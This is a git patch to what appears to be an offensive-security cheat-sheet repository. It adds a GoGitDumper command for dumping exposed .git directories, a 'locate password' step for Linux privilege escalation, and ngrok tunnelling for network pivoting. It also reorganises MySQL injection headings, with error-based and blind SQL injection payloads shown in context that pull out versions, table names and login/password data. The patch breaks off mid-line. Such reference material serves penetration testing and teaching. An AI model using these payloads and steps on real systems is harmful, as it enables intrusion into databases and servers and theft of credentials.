From 13864bde04577962cb9a312fe6e34534d076af56 Mon Sep 17 00:00:00 2001 From: Swissky Date: Mon, 15 Apr 2019 00:49:56 +0200 Subject: [PATCH] GoGitDumper + MySQL summary rewrite --- Insecure Source Code Management/README.md | 10 ++++ .../Linux - Privilege Escalation.md | 13 +++++ .../Network Pivoting Techniques.md | 16 +++++++ SQL Injection/MySQL Injection.md | 47 +++++++++++++------ 4 files changed, 71 insertions(+), 15 deletions(-) diff --git a/Insecure Source Code Management/README.md b/Insecure Source Code Management/README.md index 40fed0b..bef0805 100644 --- a/Insecure Source Code Management/README.md +++ b/Insecure Source Code Management/README.md @@ -3,6 +3,7 @@ - [GIT - Source code management](#git---source-code-management) - [Github example with a .git](#github-example-with-a-git) - [Automatic way : diggit.py](#automatic-way--diggitpy) + - [Automatic way : GoGitDumper](#automatic-way-gogitdumper) - [Automatic way : rip-git](#automatic-way--rip-git) - [Automatic way : GitHack](#automatic-way--githack) - [Harvesting secrets : trufflehog](#harvesting-secrets--trufflehog) @@ -108,6 +109,15 @@ sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141 -o is a hash of particular Git object to download ``` +### Automatic way : GoGitDumper + +```powershell +go get github.com/c-sto/gogitdumper +gogitdumper -u http://urlhere.com/.git/ -o yourdecideddir/.git/ +git log +git checkout +``` + ### Automatic way : rip-git ```powershell diff --git a/Methodology and Resources/Linux - Privilege Escalation.md b/Methodology and Resources/Linux - Privilege Escalation.md index 9242f04..828e58e 100644 --- a/Methodology and Resources/Linux - Privilege Escalation.md +++ b/Methodology and Resources/Linux - Privilege Escalation.md @@ -17,6 +17,7 @@ * [Files containing passwords](#files-containing-passwords) * [Last edited files](#last-edited-files) * [In memory passwords](#in-memory-passwords) + * [Find sensitive files](#find-sensitive-files) * [Scheduled tasks](#scheduled-tasks) * [Cron jobs](#cron-jobs) * [Systemd timers](#systemd-timers) @@ -139,6 +140,18 @@ find / -mmin -10 2>/dev/null | grep -Ev "^/proc" strings /dev/mem -n10 | grep -i PASS ``` +### Find sensitive files + +```powershell +$ locate password | more +/boot/grub/i386-pc/password.mod +/etc/pam.d/common-password +/etc/pam.d/gdm-password +/etc/pam.d/gdm-password.original +/lib/live/config/0031-root-password +... +``` + ## Scheduled tasks ### Cron jobs diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md index e69f7c0..227d80a 100644 --- a/Methodology and Resources/Network Pivoting Techniques.md +++ b/Methodology and Resources/Network Pivoting Techniques.md @@ -130,6 +130,22 @@ plink -l root -pw mypassword 192.168.18.84 -R plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP] ``` +## ngrok + +```powershell +# get the binary +wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip +unzip ngrok-stable-linux-amd64.zip + +# log into the service +./ngrok authtoken 3U[REDACTED_TOKEN]Hm + +# deploy a port forwarding for 4433 +./ngrok http 4433 +./ngrok tcp 4433 +``` + + ## Basic Pivoting Types | Type | Use Case | diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 3677441..cbae419 100644 --- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -8,13 +8,15 @@ * [Extract database with information_schema](#extract-database-with-information-schema) * [Extract data without information_schema](#extract-data-without-information-schema) * [Extract data without columns name](#extract-data-without-columns-name) -* [MYSQL Error Based - Basic](#mysql-error-based---basic) -* [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function) -* [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function) -* [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) -* [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) -* [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) -* [MYSQL Blind with LIKE](#mysql-blind-with-like) +* [MYSQL Error Based](#mysql-error-based) + * [MYSQL Error Based - Basic](#mysql-error-based---basic) + * [MYSQL Error Based - UpdateXML function](#mysql-error-based---updatexml-function) + * [MYSQL Error Based - Extractvalue function](#mysql-error-based---extractvalue-function) +* [MYSQL Blind](#mysql-blind) + * [MYSQL Blind with substring equivalent](#mysql-blind-with-substring-equivalent) + * [MYSQL Blind using a conditional statement](#mysql-blind-using-a-conditional-statement) + * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) + * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) @@ -108,7 +110,12 @@ MariaDB [dummydb]> select author_id,title from posts where author_id=-1 union se ``` -## MYSQL Error Based - Basic + + + +## MYSQL Error Based + +### MYSQL Error Based - Basic Works with `MySQL >= 4.1` @@ -117,7 +124,7 @@ Works with `MySQL >= 4.1` '+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+' ``` -## MYSQL Error Based - UpdateXML function +### MYSQL Error Based - UpdateXML function ```sql AND updatexml(rand(),concat(CHAR(126),version(),CHAR(126)),null)- @@ -134,7 +141,7 @@ Shorter to read: ' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - ``` -## MYSQL Error Based - Extractvalue function +### MYSQL Error Based - Extractvalue function Works with `MySQL >= 5.1` @@ -146,7 +153,9 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(12 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` -## MYSQL Blind with substring equivalent +## MYSQL Blind + +### MYSQL Blind with substring equivalent ```sql ?id=1 and substring(version(),1,1)=5 @@ -156,7 +165,7 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126) ?id=1 and (select mid(version(),1,1)=4) ``` -## MYSQL Blind using a conditional statement +### MYSQL Blind using a conditional statement TRUE: `if @@version starts with a 5`: @@ -174,7 +183,7 @@ Response: HTTP/1.1 200 OK ``` -## MYSQL Blind with MAKE_SET +### MYSQL Blind with MAKE_SET ```sql AND MAKE_SET(YOLO<(SELECT(length(version()))),1) @@ -183,7 +192,7 @@ AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1) AND MAKE_SET(YOLO